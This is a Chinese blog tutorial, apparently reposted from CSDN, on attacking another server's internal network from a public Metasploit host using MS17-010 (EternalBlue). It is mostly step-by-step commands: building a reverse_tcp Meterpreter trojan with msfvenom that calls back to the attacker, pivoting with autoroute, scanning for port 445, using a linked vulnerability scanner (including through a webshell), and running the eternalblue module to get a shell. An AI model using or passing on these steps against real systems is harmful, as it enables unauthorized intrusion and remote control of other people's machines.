利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)

前言

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

准备工作

1.安装了Msf的公网主机+Ubuntu系统

2.一台其他服务器内网存在445漏洞

3.细心,细心,细心,钻研,钻研!!!

 

开始第一步:公网主机操作

生成msf木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

Msf监听端口:6666

可以看到,图中获取到了shell!

添加路由

第一步:run get_local_subnets (获取当前路由)

第二步:run autoroute -s 192.168.3.0/24 (添加路由)

第三步:run autoroute -p (查看已添加路由)

使用Payload进行攻击

第一步:background(转换到后台)

第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)

第三步:exploit(开始扫描)

注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

如何列出那些存在445漏洞的PC?

MS_17_010_Scan.ziphttps://bbs.ichunqiu.com/thread-40308-1-1.html

描述:

工具的使用步骤如下:
解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
-ip参数可以指定IP扫描,同时支持IP段扫描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file参数支持从文件读取IP列表进行扫描:
MS_17_010_Scan.exe -file ip.txt
工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
输出结果同时保存在当前目录的result.txt中。
 

上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)

 

攻击正式开始

第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)

第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)

第三步:exploit(执行攻击)

第四步:攻击完成,并且自动返回一个shell控制台(如下图)

 

猜你喜欢

转载自blog.csdn.net/nzjdsds/article/details/82014829